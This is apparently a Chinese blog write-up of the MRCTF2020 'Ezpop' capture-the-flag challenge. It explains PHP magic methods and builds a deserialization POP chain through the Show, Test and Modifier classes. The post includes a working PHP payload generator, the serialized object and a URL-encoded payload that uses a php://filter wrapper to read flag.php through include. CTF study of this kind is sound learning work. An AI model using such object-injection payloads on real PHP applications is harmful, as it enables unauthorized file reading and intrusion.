[MRCTF2020]Ezpop

本文详细介绍了PHP中的魔术方法如__get、__set、__wakeup等在反序列化过程中的作用,结合实例展示了如何利用这些方法构造payload来读取flag.php的源码。解题思路中提到,通过创建Modifier和Show类,利用__invoke和__toString方法,最终实现反序列化并获取flag。
摘要由CSDN通过智能技术生成

[MRCTF2020]Ezpop

就像题目说的,又是一道反序列化的 pop 链的题,直接给了源码
在这里插入图片描述

几个小知识

1、__get() 是访问不存在的成员变量时调用的。
2、__set() 是设置不存在的成员变量时调用的。

举个例子

<?php
class Test{
    public $c=0;
    public $arr=array();

    public function __set($x,$y){
        echo $x . "\n";
        echo $y . "\n";
        $this->arr[$x]=$y;
    }
    public function __get($x){
        echo "The value of $x is".$this->arr[$x];
    }
}
$a = new Test;
$a->b = 1 ;//成员变量b不存在,所以会调用__set
$a->c  = 2;//成员变量c存在,所以无任何输出
$d=$a->b;//  成员变量b不存在,所以会调用__get
?>

3、__wakeup 使用反序列化函数时触发
4、__toString 当一个对象被当作字符串对待的时候,会触发这个魔术方法。
5、__invoke 当脚本尝试将对象调用为函数时触发。

解题思路

整体看一遍,危险函数include,我们可以利用var变量为php伪协议就可以读取到flag.php源码。需要利用就要调用 __invoke 函数。

而需要调用它只有Test类可以做到。且需要触发__get且把$p 赋值为Modifier类

要触发__get类,我们看到show类中的__toString可以触发,且此时str等于Test类,Test类不存在source变量

要触发__toString类,有2个方法。第一我们调用__construct函数且传参一个Show类,第二我们直接利用__wakeup且直接把str赋值为Show类。

payload

<?php
class Modifier {
    protected  $var='php://filter/convert.base64-encode/resource=flag.php';
}
class Show{
    public $source;
    public $str;
    public function __construct($file){
        $this->source = $file;
    }
}
class Test{
    public $p ;
    public function __construct(){
        $this->p = new Modifier();
    }
}
$o = new Show();
$o->str= new Test();
$a= new Show($o);
echo serialize($a);
//O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"*var";s:52:"php://filter/convert.base64-encode/resource=flag.php";}}}s:3:"str";N;}

得到的序列化URL编码一下

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
在这里插入图片描述

最后base64解码就是flag了
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值